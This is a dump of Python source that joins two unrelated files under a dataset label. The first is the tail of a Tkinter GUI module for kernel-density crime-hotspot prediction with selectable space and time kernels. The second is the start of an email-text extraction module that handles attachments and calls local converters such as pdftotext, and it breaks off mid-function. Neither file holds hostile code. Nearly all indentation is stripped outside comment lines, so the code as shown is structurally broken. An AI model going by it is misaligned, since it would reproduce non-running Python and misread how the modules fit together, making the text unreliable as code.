for model in self._sk_model:
if model.name == name:
model.from_dict(d)
for name, d in data["time_models"].items():
for model in self._tk_model:
if model.name == name:
model.from_dict(d)
def make_tasks(self):
return [self.Task(self)]
class Task(predictor.GridPredictorTask):
def __init__(self, parent):
super().__init__()
self._kde = parent
def __call__(self, analysis_model, grid_task, project_task):
timed_points = self.projected_data(analysis_model, project_task)
if timed_points.number_data_points == 0:
raise predictor.PredictionError(_text["no_data"])
grid = grid_task(timed_points)
train_start, train_end, _, _ = analysis_model.time_range
time_task = self._kde.time_kernel_model.select_data_task(train_start, train_end)
time_kernel = self._kde.time_kernel_model.make_kernel()
space_kernel_provider = self._kde.space_kernel_model.make_kernel()
return KDE.SubTask(timed_points, grid, time_task, time_kernel,
space_kernel_provider)
class SubTask(predictor.SingleGridPredictor):
def __init__(self, timed_points, grid, time_task, time_kernel,
space_kernel_provider):
super().__init__()
self._timed_points = timed_points
self._time_task = time_task
self._grid = grid
self._time_kernel = time_kernel
self._space_kernel_provider = space_kernel_provider
def __call__(self, predict_time, length=None):
start_time, end_time, time_unit = self._time_task(predict_time)
predictor = open_cp.kde.KDE(grid=self._grid)
predictor.data = self._timed_points
predictor.time_unit = time_unit
predictor.time_kernel = self._time_kernel
predictor.space_kernel = self._space_kernel_provider
return predictor.predict(start_time = start_time, end_time = end_time)
def config(self):
return {"resize": True}
def test_coords(self):
return self._projected_coords()
class SpaceKernel(enum.Enum):
scipy = 0
nearest = 1
@property
def space_kernel(self):
return self._space_kernel
@space_kernel.setter
def space_kernel(self, value):
self._space_kernel = self.SpaceKernel(value)
@property
def space_kernel_model(self):
return self._sk_model[self.space_kernel.value]
class TimeKernel(enum.Enum):
training = 0
window = 1
exponential = 2
quadratic = 3
@property
def time_kernel(self):
return self._time_kernel
@time_kernel.setter
def time_kernel(self, value):
self._time_kernel = self.TimeKernel(value)
@property
def time_kernel_model(self):
return self._tk_model[self.time_kernel.value]
class BaseKDEView():
def find_min_max(self, coords):
xmin, xmax = np.min(coords), np.max(coords)
xd = xmax - xmin
return xmin - xd / 20, xmax + xd / 20
def sample_kernel(self, kernel_provider, data, ax):
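        # kernel_provider is a callable which, given the (2, N) data array,
        # returns a kernel accepting [xs, ys] coordinate arrays.  The kernel
        # is sampled on a 100x100 grid covering the data's bounding box
        # (padded by 5% on each side) and drawn with pcolormesh.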
data = np.asarray(data)
kernel = kernel_provider(data)
xmin, xmax = self.find_min_max(data[0])
xs = np.linspace(xmin, xmax, 100)
ymin, ymax = self.find_min_max(data[1])
ys = np.linspace(ymin, ymax, 100)
matrix = np.empty((100,100))
for yi, y in enumerate(ys):
matrix[yi,:] = kernel([xs, np.asarray([y] * len(xs))])
ax.pcolormesh(xs, ys, matrix)
def make_plot_task(self, kernel_provider, coords):
def task():
fig = mtp.new_figure((6,6))
ax = fig.add_subplot(1,1,1)
xcs, ycs = coords
self.sample_kernel(kernel_provider, [xcs, ycs], ax)
ax.set_aspect(1)
fig.set_tight_layout("tight")
return fig
return task
class ScipyKDE():
def __init__(self, main_model):
self.main_model = main_model
@property
def name(self):
return "scipy"
@property
def settings_string(self):
return ""
def to_dict(self):
return {}
def from_dict(self, data):
pass
def make_view(self, parent):
return self.View(self, parent)
def make_kernel(self):
return open_cp.kde.GaussianBaseProvider()
class View(ttk.Frame, BaseKDEView):
def __init__(self, model, parent):
super().__init__(parent)
self.model = model
util.stretchy_rows_cols(self, [2], [0])
text = richtext.RichText(self, height=3, scroll="v")
text.grid(row=0, column=0, sticky=tk.NSEW)
text.add_text(_text["scipy_main"])
self._plot = mtp.CanvasFigure(self)
self._plot.grid(row=2, column=0, sticky=tk.NSEW)
tooltips.ToolTipYellow(self._plot, _text["kdeplot"])
coords = self.model.main_model.test_coords()
if coords is None:
return
kernel_provider = self.model.make_kernel()
task = self.make_plot_task(kernel_provider, coords)
self._plot.set_figure_task(task)
class NearestKDE():
def __init__(self, main_model):
self.main_model = main_model
self._k = 15
@property
def name(self):
return "nearest"
@property
def settings_string(self):
return str(self.k)
def to_dict(self):
return {"k" : self.k}
def from_dict(self, data):
self.k = data["k"]
@property
def k(self):
return self._k
@k.setter
def k(self, v):
self._k = int(v)
def make_view(self, parent):
return self.View(self, parent)
def make_kernel(self):
return open_cp.kde.GaussianNearestNeighbourProvider(self.k)
class View(ttk.Frame, BaseKDEView):
def __init__(self, model, parent):
super().__init__(parent)
self.model = model
util.stretchy_rows_cols(self, [2], [0])
text = richtext.RichText(self, height=3, scroll="v")
text.grid(row=0, column=0, sticky=tk.NSEW)
text.add_text(_text["nkde_main"])
frame = ttk.Frame(self)
frame.grid(row=1, column=0, sticky=tk.W)
label = ttk.Label(frame, text=_text["nkde_k"])
label.grid(row=0, column=0, padx=2, pady=2)
tooltips.ToolTipYellow(label, _text["nkde_k_tt"])
self._k_value = tk.StringVar()
entry = ttk.Entry(frame, textvariable=self._k_value)
entry.grid(row=0, column=1, padx=2, pady=2)
util.IntValidator(entry, self._k_value, callback=self._k_changed)
self._plot = mtp.CanvasFigure(self)
self._plot.grid(row=2, column=0, sticky=tk.NSEW)
tooltips.ToolTipYellow(self._plot, _text["kdeplot"])
self.update()
def update(self):
self._k_value.set(self.model.k)
coords = self.model.main_model.test_coords()
if coords is None:
return
kernel_provider = self.model.make_kernel()
task = self.make_plot_task(kernel_provider, coords)
self._plot.set_figure_task(task)
def _k_changed(self):
self.model.k = self._k_value.get()
self.update()
class TrainOnly():
def __init__(self):
pass
@property
def name(self):
return "training dates only"
@property
def settings_string(self):
return ""
def to_dict(self):
return {}
def from_dict(self, data):
pass
def make_view(self, parent):
return self.View(self, parent)
def make_kernel(self):
return open_cp.kde.ConstantTimeKernel()
def select_data_task(self, train_start, train_end):
return self.SelectDataTask(train_start, train_end)
class SelectDataTask():
def __init__(self, train_start, train_end):
self._times = train_start, train_end
def __call__(self, predict_time):
return (*self._times, np.timedelta64(1, "s"))
class View(ttk.Frame):
def __init__(self, model, parent):
super().__init__(parent)
self.model = model
util.stretchy_columns(self, [0])
text = richtext.RichText(self, height=3, scroll="v")
text.grid(row=0, column=0, sticky=tk.NSEW)
text.add_text(_text["to_main"])
class Window():
def __init__(self):
self.days = 30
@property
def name(self):
return "time window"
@property
def settings_string(self):
return "{} days".format(self.days)
def to_dict(self):
return {"days" : self.days}
def from_dict(self, data):
self.days = data["days"]
@property
def days(self):
return self._days
@days.setter
def days(self, value):
self._days = float(value)
def make_view(self, parent):
return self.View(self, parent)
def make_kernel(self):
return open_cp.kde.ConstantTimeKernel()
def select_data_task(self, train_start=None, train_end=None):
return self.SelectDataTask(self.days)
class SelectDataTask():
def __init__(self, days_back):
self._days = ( (np.timedelta64(1, "D") / np.timedelta64(1, "s"))
* days_back * np.timedelta64(1, "s") )
def __call__(self, predict_time):
end_time = np.datetime64(predict_time)
start_time = end_time - self._days
return start_time, end_time, np.timedelta64(1, "s")
class View(ttk.Frame):
def __init__(self, model, parent):
super().__init__(parent)
self.model = model
util.stretchy_rows_cols(self, [2], [0])
text = richtext.RichText(self, height=3, scroll="v")
text.grid(row=0, column=0, sticky=tk.NSEW)
text.add_text(_text["wi_main"])
frame = ttk.Frame(self)
frame.grid(row=1, column=0, sticky=tk.W)
label = ttk.Label(frame, text=_text["wi_days"])
label.grid(row=0, column=0, padx=2, pady=2)
tooltips.ToolTipYellow(label, _text["wi_days_tt"])
self._days_value = tk.StringVar()
entry = ttk.Entry(frame, textvariable=self._days_value)
entry.grid(row=0, column=1, padx=2, pady=2)
util.FloatValidator(entry, self._days_value, callback=self._days_changed)
self._plot = mtp.CanvasFigure(self)
self._plot.grid(row=2, column=0, sticky=tk.NSEW)
self.update()
def update(self):
self._days_value.set(self.model.days)
def task():
fig = mtp.new_figure((6,4))
ax = fig.add_subplot(1,1,1)
x = [0, self.model.days, self.model.days, self.model.days*1.1]
y = [1,1,0,0]
ax.plot(x, y)
ax.set(xlabel=_text["days"], ylabel=_text["int"], xlim=[0, self.model.days*1.1], ylim=[-0.1,1.1])
return fig
self._plot.set_figure_task(task)
def _days_changed(self):
self.model.days = self._days_value.get()
self.update()
class ExpDecay():
def __init__(self):
self.scale = 20
@property
def name(self):
return "exponential decay"
@property
def settings_string(self):
return "{} days".format(self.scale)
def to_dict(self):
return {"scale" : self.scale}
def from_dict(self, data):
self.scale = data["scale"]
@property
def scale(self):
return self._scale
@scale.setter
def scale(self, value):
self._scale = float(value)
def make_view(self, parent):
return self.View(self, parent)
def make_kernel(self):
return open_cp.kde.ExponentialTimeKernel(self.scale)
def select_data_task(self, train_start=None, train_end=None):
return self.SelectDataTask(self.scale)
class SelectDataTask():
def __init__(self, scale):
            # Look back seven times the scale: assuming exponential decay
            # exp(-t / scale), the weight at that age is exp(-7), which is
            # below 0.1 % of full intensity.
self._days = ( (np.timedelta64(1, "D") / np.timedelta64(1, "s"))
* scale * 7 * np.timedelta64(1, "s") )
def __call__(self, predict_time):
end_time = np.datetime64(predict_time)
start_time = end_time - self._days
return start_time, end_time, np.timedelta64(1, "s")
class View(ttk.Frame):
def __init__(self, model, parent):
super().__init__(parent)
self.model = model
util.stretchy_rows_cols(self, [2], [0])
text = richtext.RichText(self, height=3, scroll="v")
text.grid(row=0, column=0, sticky=tk.NSEW)
text.add_text(_text["ex_main"])
frame = ttk.Frame(self)
frame.grid(row=1, column=0, sticky=tk.W)
label = ttk.Label(frame, text=_text["ex_scale"])
label.grid(row=0, column=0, padx=2, pady=2)
tooltips.ToolTipYellow(label, _text["ex_scale_tt"])
self._scale_value = tk.StringVar()
entry = ttk.Entry(frame, textvariable=self._scale_value)
entry.grid(row=0, column=1, padx=2, pady=2)
util.FloatValidator(entry, self._scale_value, callback=self._days_changed)
self._plot = mtp.CanvasFigure(self)
self._plot.grid(row=2, column=0, sticky=tk.NSEW)
self.update()
def update(self):
self._scale_value.set(self.model.scale)
def task():
fig = mtp.new_figure((6,4))
ax = fig.add_subplot(1,1,1)
x = np.linspace(0, self.model.scale*5, 100)
kernel = self.model.make_kernel()
ax.plot(x, kernel(x))
ax.set(xlabel=_text["days"], ylabel=_text["int"], xlim=[0, self.model.scale*5], ylim=[0,1])
fig.set_tight_layout("tight")
return fig
self._plot.set_figure_task(task)
def _days_changed(self):
self.model.scale = self._scale_value.get()
self.update()
class QuadDecay():
def __init__(self):
self.scale = 20
@property
def name(self):
return "quadratic decay"
@property
def settings_string(self):
return "{} days".format(self.scale)
def to_dict(self):
return {"scale" : self.scale}
def from_dict(self, data):
self.scale = data["scale"]
@property
def scale(self):
return self._scale
@scale.setter
def scale(self, value):
self._scale = float(value)
def make_view(self, parent):
return self.View(self, parent)
def make_kernel(self):
return open_cp.kde.QuadDecayTimeKernel(self.scale)
def select_data_task(self, train_start=None, train_end=None):
return self.SelectDataTask(self.scale)
class SelectDataTask():
def __init__(self, scale):
            # Look back 32 times the scale: assuming a quadratic decay of the
            # form 1 / (1 + (t / scale) ** 2), the weight at that age is about
            # 1 / 1025, below 0.1 % of full intensity.
self._days = ( (np.timedelta64(1, "D") / np.timedelta64(1, "s"))
* scale * 32 * np.timedelta64(1, "s") )
def __call__(self, predict_time):
end_time = np.datetime64(predict_time)
start_time = end_time - self._days
return start_time, end_time, np.timedelta64(1, "s")
class View(ttk.Frame):
def __init__(self, model, parent):
super().__init__(parent)
self.model = model
util.stretchy_rows_cols(self, [2], [0])
text = richtext.RichText(self, height=3, scroll="v")
text.grid(row=0, column=0, sticky=tk.NSEW)
text.add_text(_text["qu_main"])
frame = ttk.Frame(self)
frame.grid(row=1, column=0, sticky=tk.W)
label = ttk.Label(frame, text=_text["qu_scale"])
label.grid(row=0, column=0, padx=2, pady=2)
tooltips.ToolTipYellow(label, _text["qu_scale_tt"])
self._scale_value = tk.StringVar()
entry = ttk.Entry(frame, textvariable=self._scale_value)
entry.grid(row=0, column=1, padx=2, pady=2)
util.FloatValidator(entry, self._scale_value, callback=self._days_changed)
self._plot = mtp.CanvasFigure(self)
self._plot.grid(row=2, column=0, sticky=tk.NSEW)
self.update()
def update(self):
self._scale_value.set(self.model.scale)
def task():
fig = mtp.new_figure((6,4))
ax = fig.add_subplot(1,1,1)
x = np.linspace(0, self.model.scale*5, 100)
kernel = self.model.make_kernel()
ax.plot(x, kernel(x))
ax.set(xlabel=_text["days"], ylabel=_text["int"], xlim=[0, self.model.scale*5], ylim=[0,1])
return fig
self._plot.set_figure_task(task)
def _days_changed(self):
self.model.scale = self._scale_value.get()
self.update()
class KDEView(tk.Frame):
def __init__(self, parent, model):
super().__init__(parent)
self.model = model
util.stretchy_rows_cols(self, [1], [0])
self._text = richtext.RichText(self, height=12, scroll="v")
self._text.grid(row=0, column=0, sticky=tk.NSEW)
self._text.add_text(_text["main"])
frame = ttk.Frame(self)
self.add_widgets(frame)
frame.grid(row=1, column=0, sticky=tk.NSEW)
self.update()
def update(self):
self._update_space()
self._update_time()
def add_widgets(self, frame):
util.stretchy_rows_cols(frame, [1], [0,1])
subframe = ttk.Frame(frame)
subframe.grid(row=0, column=0, sticky=tk.NSEW, padx=1, pady=1)
label = ttk.Label(subframe, text=_text["sk"])
label.grid(row=0, column=0, padx=2)
tooltips.ToolTipYellow(label, _text["sktt"])
self._space_cbox = ttk.Combobox(subframe, height=5, state="readonly", width=40,
values=_text["skernals"])
self._space_cbox.bind("<<ComboboxSelected>>", self._space_changed)
self._space_cbox.grid(row=0, column=1, padx=2)
self._space_frame = ttk.LabelFrame(frame, text=_text["sks"])
self._space_frame.grid(row=1, column=0, sticky=tk.NSEW, padx=1, pady=1)
util.stretchy_rows_cols(self._space_frame, [0], [0])
subframe = ttk.Frame(frame)
subframe.grid(row=0, column=1, sticky=tk.NSEW, padx=1, pady=1)
label = ttk.Label(subframe, text=_text["tk"])
label.grid(row=0, column=0, padx=2)
tooltips.ToolTipYellow(label, _text["tktt"])
self._time_cbox = ttk.Combobox(subframe, height=5, state="readonly", width=40,
values=_text["tchoices"])
self._time_cbox.bind("<<ComboboxSelected>>", self._time_changed)
self._time_cbox.grid(row=0, column=1, padx=2)
self._time_frame = ttk.LabelFrame(frame, text=_text["tks"])
self._time_frame.grid(row=1, column=1, sticky=tk.NSEW, padx=1, pady=1)
util.stretchy_rows_cols(self._time_frame, [0], [0])
def _space_changed(self, event=None):
self.model.space_kernel = int(self._space_cbox.current())
self._update_space()
def _update_space(self):
self._space_cbox.current(self.model.space_kernel.value)
for w in self._space_frame.winfo_children():
w.destroy()
view = self.model.space_kernel_model.make_view(self._space_frame)
view.grid(sticky=tk.NSEW)
def _time_changed(self, event=None):
self.model.time_kernel = int(self._time_cbox.current())
self._update_time()
def _update_time(self):
self._time_cbox.current(self.model.time_kernel.value)
for w in self._time_frame.winfo_children():
w.destroy()
view = self.model.time_kernel_model.make_view(self._time_frame)
view.grid(sticky=tk.NSEW)
def test(root):
ll = KDE(predictor.test_model())
predictor.test_harness(ll, root)
|
StarcoderdataPython
|
3212455
|
<filename>emailextract/core/emailextractor.py
# emailextractor.py
# Copyright 2017 <NAME>
# Licence: See LICENCE (BSD licence)
"""Extract text from emails and save for application specific extraction.
These classes assume text from emails are held in files in a directory, with
no sub-directories, where each file contains a single email.
Each file may start with a 'From ' line, formatted as in mbox mailbox files,
but lines within the email which start 'From ' will only have been changed to
lines starting '>From ' if the email client which accepted delivery of the
email did so. It depends on which mailbox format the email client uses.
"""
# A slightly modified results.core.emailextractor version 2.2, with all the
# stuff specific to the ChessResults application removed, is the initial
# version of this module.
import os
from datetime import date
import re
from email import message_from_binary_file
from email.utils import parseaddr, parsedate_tz
from email.message import EmailMessage
import email.header
from time import strftime
import subprocess
import io
import csv
import difflib
import shutil
import tkinter.messagebox
import zipfile
import xml.etree.ElementTree
import base64
try:
import tnefparse
except ImportError: # Not ModuleNotFoundError for Pythons earlier than 3.6
tnefparse = None
try:
import xlsx2csv
except:
xlsx2csv = None
try:
import pdfminer
from pdfminer import pdfinterp, layout, converter
except:
pdfminer = None
# Added when finding out how to use pdfminer3k to extract data from PDF files,
# and how to use xlsx2csv to extract data fron xlsx files.
import sys
from solentware_misc.core.utilities import AppSysDate
# Directory which holds emails one per file copied from email client mailboxes.
# Use imported COLLECTED attribute if available because emailextract expects to
# work with the emailstore package but can work with arbitrary collections of
# emails.
try:
from emailstore.core.emailcollector import COLLECTED
except:
COLLECTED = "collected"
# Python is installed in C: by default on Microsoft Windows, so it is deemed
# acceptable to install pdftotext.exe in HOME even though this is done by
# direct copying rather than by an installer. Per user installation is done by
# copying pdftotext.exe to HOMEDRIVE.
if sys.platform != "win32":
_PDFTOTEXT = "pdftotext"
else:
_PDFTOTEXT = "pdftotext.exe"
# xpdf installation notes for Microsoft Windows say 'copy everything to an
# installation directory, e.g. C:/Program Files/Xpdf'.
# Try to choose the 32-bit or 64-bit executable as appropriate.
if sys.maxsize > 2 ** 32:
xpdf = os.path.join("Xpdf", "bin64")
else:
xpdf = os.path.join("Xpdf", "bin32")
if os.path.isfile(
os.path.join(os.environ["USERPROFILE"], xpdf, _PDFTOTEXT)
):
_PDFTOTEXT = os.path.join(os.environ["USERPROFILE"], xpdf, _PDFTOTEXT)
elif os.path.isfile(
os.path.join(os.environ["HOMEDRIVE"], xpdf, _PDFTOTEXT)
):
_PDFTOTEXT = os.path.join(os.environ["HOMEDRIVE"], xpdf, _PDFTOTEXT)
else:
_PDFTOTEXT = None
del xpdf
# ssconvert, a tool supplied with Gnumeric, converts many spreadsheet formats
# to csv files.
# Python provides a module to handle csv files almost trivially.
# In September 2014 it was noticed that gnumeric.org withdrew all pre-built
# binaries of Gnumeric for Microsoft Windows in August 2014, citing crashes
# with profiles suggesting Gtk+ problems and lack of resources to do anything
# about it.
# I had downloaded the pre-built binary for Gnumeric-1-9-16 in March 2010.
# Later versions introduced support for putting each sheet in a separate csv
# file, but I never downloaded a Microsoft Windows binary.
# xls2csv and xlsx2csv were considered as alternatives to ssconvert to do the
# spreadsheet to csv file conversion.
# xls2csv works only on Python 2. I do not know its capabilities.
# xlsx2csv handles xlsx format only, and its output is not compatible with the
# output from ssconvert as far as this application is concerned.
# For cross-platform consistency a date format has to be specified to xlsx2csv
# otherwise one may get the raw number representing a date output as text to
# the csv file. ssconvert outputs a date according to the formatting given
# for the cell in the source spreadsheet.
# The workaround is to attach csv files created using the spreadsheet application
# to the email.
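# For reference, ssconvert is driven later (see _get_ss_text_using_gnumeric)
# with a command line equivalent to:
#   ssconvert --recalc -S <attachment> %s.csv
# which writes one csv file per sheet, while xlsx2csv is driven through its
# Python API with dateformat="%Y-%m-%d" so dates are written as text rather
# than as the underlying serial numbers.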
_SSTOCSV = "ssconvert.exe"
if sys.platform != "win32":
_SSTOCSV = "ssconvert"
else:
# Version directories exist in ../Program Files/Gnumeric for each version
# of Gnumeric installed. Pick one of them, effectively at random, if any
# exist.
# If Gnumeric is not installed, look for xlsx2csv.py in site-packages.
sstocsvdir = os.path.join(os.environ["PROGRAMFILES"], "Gnumeric")
if os.path.isdir(sstocsvdir):
sstocsv = set(os.listdir(sstocsvdir))
else:
sstocsv = None
if sstocsv:
sstocsv = os.path.join(sstocsvdir, sstocsv.pop(), "bin", _SSTOCSV)
if os.path.isfile(sstocsv):
_SSTOCSV = sstocsv
else:
_SSTOCSV = None
else:
_SSTOCSV = None
del sstocsvdir, sstocsv
# _SSTOCSV is left alone so that ssconvert is used if it is available, despite
# the problems cited in August 2014.
_MAIL_STORE = "mailstore"
_EARLIEST_DATE = "earliestdate"
_MOST_RECENT_DATE = "mostrecentdate"
_EMAIL_SENDER = "emailsender"
IGNORE_EMAIL = "ignore"
# The name of the configuration file for extracting text from emails.
EXTRACTED_CONF = "extracted.conf"
# The extract configuration file entry naming the collect configuration file
# for collecting emails from email client mailboxes.
COLLECT_CONF = "collect_conf"
# MEDIA_TYPES directory holds csv files of media types in the format provided
# by https://www.iana.org/assignments/media-types/media-types.xhtml
MEDIA_TYPES = "media_types"
# Directory which holds difference files of text extracted from emails.
EXTRACTED = "extracted"
# Identify a pdf content-type to be included in the extracted data
PDF_CONTENT_TYPE = "pdf_content_type"
# Identify a text content-type to be included in the extracted data
TEXT_CONTENT_TYPE = "text_content_type"
# Identify a spreadsheet content-type to be included in the extracted data
_SS_CONTENT_TYPE = "ss_content_type"
# Identify a comma separated value (csv) content-type to be included in the
# extracted data
CSV_CONTENT_TYPE = "csv_content_type"
# Identify a spreadsheet sheet name or csv file name to be included or
# excluded in the extracted data.
# Probably want to do ss version but maybe not csv, not done for pdf or text.
# Maybe this should be done in application specific configuration too, so
# there is choice about best place to do this.
INCLUDE_CSV_FILE = "include_csv_file"
EXCLUDE_CSV_FILE = "exclude_csv_file"
INCLUDE_SS_FILE_SHEET = "include_ss_file_sheet"
EXCLUDE_SS_FILE_SHEET = "exclude_ss_file_sheet"
# csv files should not contain '\x00' bytes but in practice some do.
# _NUL is used when decoding a csv email attachment to offer the opportunity of
# not processing such csv files.
_NUL = "\x00"
# Identify an Office Open XML word processing content-type to be included in
# the extracted data. Also known as (Microsoft) docx format.
DOCX_CONTENT_TYPE = "docx_content_type"
# Identify an Office Open XML spreadsheet content-type to be included in the
# extracted data. Also known as (Microsoft) xlsx format.
XLSX_CONTENT_TYPE = "xlsx_content_type"
# Identify an Open Office XML word processing content-type to be included in
# the extracted data. Also known as Open Document Format (*.odt).
ODT_CONTENT_TYPE = "odt_content_type"
# Identify an Open Office XML spreadsheet content-type to be included in the
# extracted data. Also known as Open Document Format (*.ods).
ODS_CONTENT_TYPE = "ods_content_type"
# Constants to handle TNEF attachments easily with non-TNEF attachments.
# Non-TNEF can use content-type for attachment directly but TNEF is
# content-type application/ms-tnef and we use the extension to decide. The
# non-TNEF version sets the appropriate constant below.
# _SS is any spreadsheet, so do not set to an extension: cannot use TNEF here.
# TNEF means emails sent by Microsoft Outlook in some circumstances.
_PDF = ".pdf"
_SS = None
_XLSX = ".xlsx"
_ODS = ".ods"
_CSV = ".csv"
_TXT = ".txt"
_DOCX = ".docx"
_ODT = ".odt"
class EmailExtractorError(Exception):
pass
# There are two distinct sets of configuration settings; email selection and
# parsing rules. EmailExtractor will end up a subclass of "Parse" which can be
# shared with EventSeason for text parsing rules.
class EmailExtractor(object):
"""Extract emails matching selection criteria from email client store.
By default look for emails sent or received using the Opera email client
in the most recent twelve months.
"""
    email_select_line = re.compile(
        "".join(
            (
                r"\A",
                "(?:",
                "(?:",  # whitespace line
                r"\s*",
                ")|",
                "(?:",  # comment line
                r"\s*#.*",
                ")|",
                "(?:",  # parameter line
                r"\s*(\S+?)\s+([^#]*).*",
                ")",
                ")",
                r"\Z",
            )
        )
    )
    replace_value_columns = re.compile(r"\+|\*")
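    # Illustrative configuration lines accepted by email_select_line
    # (hypothetical values):
    #   # pick up emails collected by the emailstore package
    #   mailstore ~/mail/collected
    #   emailsender someone@example.com
    # Blank lines and '#' comment lines match the first two alternatives;
    # 'keyword value' lines are captured by the two groups in the third.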
def __init__(
self,
folder,
configuration=None,
parser=None,
extractemail=None,
parent=None,
):
"""Define the email extraction rules from configuration.
folder - the directory containing the event's data
configuration - the rules for extracting emails
"""
self.configuration = configuration
self.criteria = None
self.email_client = None
self._folder = folder
self.parent = parent
if parser is None:
self._parser = Parser
else:
self._parser = parser
if extractemail is None:
self._extractemail = ExtractEmail
else:
self._extractemail = extractemail
def parse(self):
""" """
self.criteria = None
criteria = self._parser(parent=self.parent).parse(self.configuration)
if criteria:
self.criteria = criteria
return True
if criteria is False:
return False
return True
def _select_emails(self):
""" """
if self.criteria is None:
return
self.email_client = self._extractemail(
eventdirectory=self._folder, **self.criteria
)
return self.email_client.selected_emails
@property
def selected_emails(self):
""" """
if self.email_client:
return self.email_client.selected_emails
return self._select_emails()
@property
def excluded_emails(self):
""" """
if not self.email_client:
if not self._select_emails():
return
return self.email_client.excluded_emails
@property
def eventdirectory(self):
""" """
return self.email_client.eventdirectory
@property
def outputdirectory(self):
""" """
return self.email_client._extracts
def copy_emails(self):
""" """
difference_tags = []
additional = []
for e, em in enumerate(self.selected_emails):
# The interaction between universal newlines and difflib can cause
# problems. In particular when \r is used as a field separator.
# This way such text extracted from an email is readable because
# \r shows up as a special glyph in the tkinter Text widget.
# Later, when processing text, it shows up as a newline (\n).
if tuple(
(s.rstrip("\r\n"), s[-1] in "\r\n")
for s in "\n".join(em.extracted_text).splitlines(True)
) != tuple(
(s.rstrip("\r\n"), s[-1] in "\r\n")
for s in list(difflib.restore(em.edit_differences, 1))
):
difference_tags.append("x".join(("T", str(e))))
if em.difference_file_exists is False:
additional.append(em)
if difference_tags:
return difference_tags, None
elif additional:
w = " emails " if len(additional) > 1 else " email "
if (
tkinter.messagebox.askquestion(
parent=self.parent,
title="Update Extracted Text",
message="".join(
(
"Confirm that text from ",
str(len(additional)),
w,
" be added to version held in database.",
)
),
)
!= tkinter.messagebox.YES
):
return
else:
return None, additional
try:
os.mkdir(os.path.dirname(additional[0].difference_file_path))
except FileExistsError:
pass
for em in additional:
try:
em.write_additional_file()
except FileNotFoundError as exc:
excdir = os.path.basename(os.path.dirname(exc.filename))
tkinter.messagebox.showinfo(
parent=self.parent,
title="Update Extracted Text",
message="".join(
(
"Write additional file to directory\n\n",
os.path.basename(os.path.dirname(exc.filename)),
"\n\nfailed.\n\nHopefully because the directory ",
"does not exist yet: it could have been deleted.",
)
),
)
return
return None, additional
def ignore_email(self, filename):
""" """
if self.email_client.ignore is None:
self.email_client.ignore = set()
self.email_client.ignore.add(filename)
    def include_email(self, filename):
        """Remove filename, if present, from the set of ignored email filenames."""
        if self.email_client.ignore is None:
            self.email_client.ignore = set()
        self.email_client.ignore.discard(filename)
class Parser(object):
"""Parse configuration file."""
def __init__(self, parent=None):
self.parent = parent
# Rules for processing conf file
self.keyword_rules = {
_MAIL_STORE: self.assign_value,
_EARLIEST_DATE: self.assign_value,
_MOST_RECENT_DATE: self.assign_value,
_EMAIL_SENDER: self.add_value_to_set,
IGNORE_EMAIL: self.add_value_to_set,
COLLECT_CONF: self.assign_value,
COLLECTED: self.assign_value,
EXTRACTED: self.assign_value,
MEDIA_TYPES: self.assign_value,
PDF_CONTENT_TYPE: self.add_value_to_set,
TEXT_CONTENT_TYPE: self.add_value_to_set,
_SS_CONTENT_TYPE: self.add_value_to_set,
DOCX_CONTENT_TYPE: self.add_value_to_set,
ODT_CONTENT_TYPE: self.add_value_to_set,
XLSX_CONTENT_TYPE: self.add_value_to_set,
ODS_CONTENT_TYPE: self.add_value_to_set,
CSV_CONTENT_TYPE: self.add_value_to_set,
INCLUDE_CSV_FILE: self.add_value_to_set,
EXCLUDE_CSV_FILE: self.add_value_to_set,
INCLUDE_SS_FILE_SHEET: self.add_values_to_dict_of_sets,
EXCLUDE_SS_FILE_SHEET: self.add_values_to_dict_of_sets,
}
def assign_value(self, v, args, args_key):
args[args_key] = v
def add_value_to_set(self, v, args, args_key):
if args_key not in args:
args[args_key] = set()
args[args_key].add(v)
    def add_values_to_dict_of_sets(self, v, args, args_key):
        # The first character of the value is the separator between the file
        # name and the sheet names.
        sep = v[0]
        v = v.split(sep=sep, maxsplit=2)
        if args_key not in args:
            args[args_key] = dict()
        if len(v) < 3:
            args[args_key].setdefault(v[-1], set())
            return
        args[args_key].setdefault(v[1], set()).update(v[2].split(sep=sep))
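    # Worked example (hypothetical values): a configuration line such as
    #   include_ss_file_sheet /results.xlsx/January/February
    # uses '/' as the separator and parses to
    #   {"results.xlsx": {"January", "February"}}
    # while
    #   include_ss_file_sheet /results.xlsx
    # records the file name with an empty set, meaning all sheets.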
def _parse_error_dialogue(self, message):
tkinter.messagebox.showinfo(
parent=self.parent,
title="Configuration File",
message="".join(
(
"Extraction rules are invalid.\n\nFailed rule is:\n\n",
message,
)
),
)
def parse(self, configuration):
args = {}
for line in configuration.split("\n"):
g = EmailExtractor.email_select_line.match(line)
if not g:
self._parse_error_dialogue(line)
return False
key, value = g.groups()
if key is None:
continue
if not value:
self._parse_error_dialogue(line)
return False
args_type = self.keyword_rules.get(key.lower())
if args_type is None:
self._parse_error_dialogue(line)
return False
try:
args_type(value, args, key.lower())
except (re.error, ValueError):
self._parse_error_dialogue(line)
return False
return args
class MessageFile(EmailMessage):
"""Extend EmailMessage class with a method to generate a filename.
The From and Date headers are used.
"""
def generate_filename(self):
"""Return a base filename or None when headers are no available."""
t = parsedate_tz(self.get("Date"))
f = parseaddr(self.get("From"))[-1]
if t and f:
ts = strftime("%Y%m%d%H%M%S", t[:-1])
utc = "".join((format(t[-1] // 3600, "0=+3"), "00"))
return "".join((ts, f, utc, ".mbs"))
else:
return False
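    # For example (hypothetical values), a message with headers
    #   Date: Sat, 15 Apr 2023 10:30:00 +0100
    #   From: Someone <sender@example.com>
    # generates the filename '20230415103000sender@example.com+0100.mbs'.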
class ExtractEmail(object):
"""Extract emails matching selection criteria from email store."""
def __init__(
self,
extracttext=None,
earliestdate=None,
mostrecentdate=None,
emailsender=None,
eventdirectory=None,
ignore=None,
collect_conf=None,
collected=None,
extracted=None,
media_types=None,
pdf_content_type=None,
text_content_type=None,
ss_content_type=None,
csv_content_type=None,
docx_content_type=None,
odt_content_type=None,
xlsx_content_type=None,
ods_content_type=None,
include_csv_file=None,
exclude_csv_file=None,
include_ss_file_sheet=None,
exclude_ss_file_sheet=None,
parent=None,
**soak
):
"""Define the email extraction rules from configuration.
mailstore - the directory containing the email files
earliestdate - emails before this date are ignored
mostrecentdate - emails after this date are ignored
emailsender - iterable of from addressees to select emails
eventdirectory - directory to contain the event's data
ignore - iterable of email filenames to be ignored
"""
self.parent = parent
if extracttext is None:
self._extracttext = ExtractText
else:
self._extracttext = extracttext
if collect_conf:
try:
cc = open(
os.path.join(eventdirectory, collect_conf), encoding="utf8"
)
try:
for line in cc.readlines():
line = line.split(" ", 1)
if line[0] == COLLECTED:
